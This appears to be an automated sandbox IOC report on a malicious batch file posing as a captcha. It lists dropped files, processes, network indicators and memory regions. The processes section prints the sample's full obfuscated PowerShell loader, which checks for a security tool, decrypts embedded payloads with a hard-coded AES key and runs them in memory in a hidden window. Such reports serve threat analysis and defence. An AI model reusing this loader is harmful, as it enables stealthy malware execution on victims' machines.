IOC Report
Captcha_V4ID882994ft.bat

loading gif

Files

File Path
Type
Category
Malicious
Captcha_V4ID882994ft.bat
DOS batch file, ASCII text, with very long lines (65190), with CRLF line terminators
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0xbd411654, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02m5ip05.ht3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40ertn1r.cpf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ntb4tm.ugs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfttuavn.ydv.psm1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
\Device\ConDrv
ASCII text, with very long lines (2239), with CRLF line terminators
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://g.live.com/odclientsettings/ProdV21C:
unknown
http://crl.ver)
unknown
https://g.live.com/odclientsettings/Prod1C:
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown

Domains

Name
IP
Malicious
ax-0001.ax-msedge.net
150.171.27.10
tse1.mm.bing.net
unknown

IPs

IP
Domain
Country
Malicious
185.91.69.119
unknown
Spain
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
4B90000
trusted library allocation
page read and write
1DAEEF5E000
trusted library allocation
page read and write
1DAE9B02000
heap
page read and write
50AE000
stack
page read and write
1DAEEF30000
trusted library allocation
page read and write
1DAEEF30000
trusted library allocation
page read and write
77FE000
stack
page read and write
1DAEF0F9000
heap
page read and write
1DAE9B02000
heap
page read and write
326A000
heap
page read and write
1DAE9AB0000
heap
page read and write
32ED000
heap
page read and write
4B80000
trusted library allocation
page read and write
3060000
heap
page read and write
5370000
heap
page execute and read and write
4B70000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
7BF0000
trusted library allocation
page read and write
50B0000
heap
page readonly
7ACE000
stack
page read and write
511C000
stack
page read and write
21B5DF7000
stack
page read and write
6381000
trusted library allocation
page read and write
1DAEAA30000
trusted library allocation
page read and write
5406000
trusted library allocation
page read and write
548C000
trusted library allocation
page read and write
1DAEF02B000
heap
page read and write
506E000
stack
page read and write
5590000
trusted library allocation
page read and write
573F000
trusted library allocation
page read and write
21B68FE000
unkown
page readonly
317E000
unkown
page read and write
1DAEF2A0000
remote allocation
page read and write
32F0000
heap
page read and write
1DAE9A1F000
heap
page read and write
3510000
heap
page read and write
3276000
heap
page read and write
319A000
heap
page read and write
2DAB000
stack
page read and write
5391000
trusted library allocation
page read and write
750E000
stack
page read and write
1DAE9A6E000
heap
page read and write
7B10000
trusted library allocation
page read and write
3230000
heap
page read and write
1DAEEF01000
trusted library allocation
page read and write
1DAE9AAC000
heap
page read and write
515E000
stack
page read and write
7969000
heap
page read and write
7B40000
trusted library allocation
page read and write
321E000
stack
page read and write
7BB0000
trusted library allocation
page read and write
3530000
heap
page read and write
1DAE9940000
heap
page read and write
1DAEF570000
trusted library allocation
page read and write
1DAE9A90000
heap
page read and write
5452000
trusted library allocation
page read and write
31DE000
unkown
page read and write
5381000
trusted library allocation
page read and write
3240000
heap
page read and write
74CF000
stack
page read and write
1DAE9A74000
heap
page read and write
1DAEF0E6000
heap
page read and write
538C000
trusted library allocation
page read and write
78E6000
heap
page read and write
1DAEF093000
heap
page read and write
1DAE9A13000
heap
page read and write
1DAEA215000
heap
page read and write
3190000
heap
page read and write
1DAEA191000
trusted library allocation
page read and write
325D000
heap
page read and write
7BC0000
trusted library allocation
page read and write
539D000
trusted library allocation
page read and write
1DAE9A78000
heap
page read and write
51DE000
stack
page read and write
1DAEF570000
trusted library allocation
page read and write
5000000
trusted library allocation
page read and write
1DAEA31A000
heap
page read and write
1DAE9950000
heap
page read and write
1DAEA1D0000
trusted library allocation
page read and write
7C10000
trusted library allocation
page execute and read and write
1DAEEF40000
trusted library allocation
page read and write
1DAEF0FE000
heap
page read and write
75CA000
stack
page read and write
32EA000
heap
page read and write
3278000
heap
page read and write
7B30000
trusted library allocation
page read and write
1DAEF0C8000
heap
page read and write
85F0000
trusted library allocation
page read and write
1DAE9980000
trusted library allocation
page read and write
52FE000
stack
page read and write
1DAEF062000
heap
page read and write
1DAE9AA5000
heap
page read and write
7C00000
trusted library allocation
page read and write
7914000
heap
page read and write
1DAEA202000
heap
page read and write
1DAEA31B000
heap
page read and write
3283000
heap
page read and write
1DAE9A41000
heap
page read and write
527E000
stack
page read and write
1DAEF230000
trusted library allocation
page read and write
4B84000
trusted library allocation
page read and write
21B64FE000
unkown
page readonly
523E000
stack
page read and write
78E0000
heap
page read and write
1DAEEF00000
trusted library allocation
page read and write
78BE000
stack
page read and write
1DAEF050000
heap
page read and write
21B5A7B000
stack
page read and write
1DAE9AFC000
heap
page read and write
4B99000
trusted library allocation
page read and write
567A000
trusted library allocation
page read and write
7B0D000
stack
page read and write
1DAE9A5B000
heap
page read and write
5466000
trusted library allocation
page read and write
5463000
trusted library allocation
page read and write
7650000
heap
page read and write
1DAEEEF0000
trusted library allocation
page read and write
1DAEF102000
heap
page read and write
1DAEF000000
heap
page read and write
8600000
trusted library allocation
page read and write
1DAEF050000
trusted library allocation
page read and write
1DAEEF44000
trusted library allocation
page read and write
1DAEEEE0000
trusted library allocation
page read and write
5170000
trusted library allocation
page read and write
560C000
trusted library allocation
page read and write
545D000
trusted library allocation
page read and write
787E000
stack
page read and write
21B5FFE000
stack
page read and write
1DAEF060000
trusted library allocation
page read and write
63A9000
trusted library allocation
page read and write
5457000
trusted library allocation
page read and write
3180000
heap
page read and write
53C8000
trusted library allocation
page read and write
5007000
trusted library allocation
page execute and read and write
1DAEF0D9000
heap
page read and write
1DAEEFF0000
trusted library allocation
page read and write
1DAE9B17000
heap
page read and write
793A000
heap
page read and write
1DAEF2A0000
remote allocation
page read and write
7B50000
trusted library allocation
page read and write
1DAEA304000
heap
page read and write
1DAEA313000
heap
page read and write
4BB0000
heap
page read and write
53F2000
trusted library allocation
page read and write
21B807E000
stack
page read and write
3259000
heap
page read and write
760E000
stack
page read and write
21B80FE000
unkown
page readonly
7983000
heap
page read and write
3254000
heap
page read and write
5002000
trusted library allocation
page read and write
4B83000
trusted library allocation
page execute and read and write
1DAEA1E0000
trusted library allocation
page read and write
7961000
heap
page read and write
758D000
stack
page read and write
1DAE9AB0000
heap
page read and write
1DAEF070000
heap
page read and write
7B70000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
336E000
stack
page read and write
51F0000
heap
page execute and read and write
7965000
heap
page read and write
1DAEF10F000
heap
page read and write
1DAEEFE0000
trusted library allocation
page read and write
7A00000
heap
page execute and read and write
2DE8000
stack
page read and write
1DAE9920000
heap
page read and write
4BD7000
heap
page read and write
1DAE9A89000
heap
page read and write
21B7AFE000
unkown
page readonly
796F000
heap
page read and write
4B8D000
trusted library allocation
page execute and read and write
754A000
stack
page read and write
7A4E000
stack
page read and write
7BA0000
trusted library allocation
page read and write
1DAEF00E000
heap
page read and write
1DAEEF20000
trusted library allocation
page read and write
353B000
heap
page read and write
764E000
stack
page read and write
1DAEF250000
trusted library allocation
page read and write
21B60FE000
unkown
page readonly
21B63F9000
stack
page read and write
7B60000
trusted library allocation
page read and write
1DAE9AB9000
heap
page read and write
795E000
heap
page read and write
4BC0000
heap
page read and write
5005000
trusted library allocation
page execute and read and write
1DAEA840000
trusted library allocation
page read and write
544F000
trusted library allocation
page read and write
1DAE9A9B000
heap
page read and write
1DAEEFF0000
trusted library allocation
page read and write
1DAEF4E0000
trusted library allocation
page read and write
3235000
heap
page read and write
740D000
stack
page read and write
2DED000
stack
page read and write
1DAEF200000
trusted library allocation
page read and write
783E000
stack
page read and write
744B000
stack
page read and write
1DAEEFD0000
trusted library allocation
page read and write
55B2000
trusted library allocation
page read and write
1DAF0000000
heap
page read and write
1DAEF055000
heap
page read and write
1DAEEFF0000
trusted library allocation
page read and write
21B5EFE000
unkown
page readonly
1DAEF0F3000
heap
page read and write
578A000
trusted library allocation
page read and write
5190000
heap
page read and write
7A8E000
stack
page read and write
792A000
heap
page read and write
21B5CFE000
unkown
page readonly
7660000
heap
page read and write
1DAEAEB0000
trusted library allocation
page read and write
7B20000
trusted library allocation
page execute and read and write
1DAEF2A0000
remote allocation
page read and write
21B79FC000
stack
page read and write
1DAEEFD0000
trusted library allocation
page read and write
1DAE9AAC000
heap
page read and write
1DAEF043000
heap
page read and write
1DAEF0C2000
heap
page read and write
1DAEEF02000
trusted library allocation
page read and write
1DAEF0F6000
heap
page read and write
1DAEF01E000
heap
page read and write
63E9000
trusted library allocation
page read and write
1DAEF0C4000
heap
page read and write
5160000
trusted library allocation
page execute and read and write
5020000
trusted library allocation
page read and write
1DAEA200000
heap
page read and write
798B000
heap
page read and write
1DAEEF00000
trusted library allocation
page read and write
1DAE9A00000
heap
page read and write
1DAE9A27000
heap
page read and write
32F2000
heap
page read and write
7977000
heap
page read and write
7BD0000
heap
page read and write
533E000
stack
page read and write
52BE000
stack
page read and write
1DAE9B06000
heap
page read and write
1DAEA302000
heap
page read and write
79E0000
trusted library allocation
page read and write
7BE0000
trusted library allocation
page read and write
51F5000
heap
page execute and read and write
1DAEA300000
heap
page read and write
545A000
trusted library allocation
page read and write
1DAE9B13000
heap
page read and write
53B9000
trusted library allocation
page read and write
21B67FB000
stack
page read and write
1DAEF113000
heap
page read and write
1DAEF10C000
heap
page read and write
1DAE9AFC000
heap
page read and write
1DAEF240000
trusted library allocation
page read and write
21B5BFE000
stack
page read and write
1DAEEF40000
trusted library allocation
page read and write
1DAEA500000
trusted library allocation
page read and write
748E000
stack
page read and write
There are 244 hidden memdumps, click here to show them.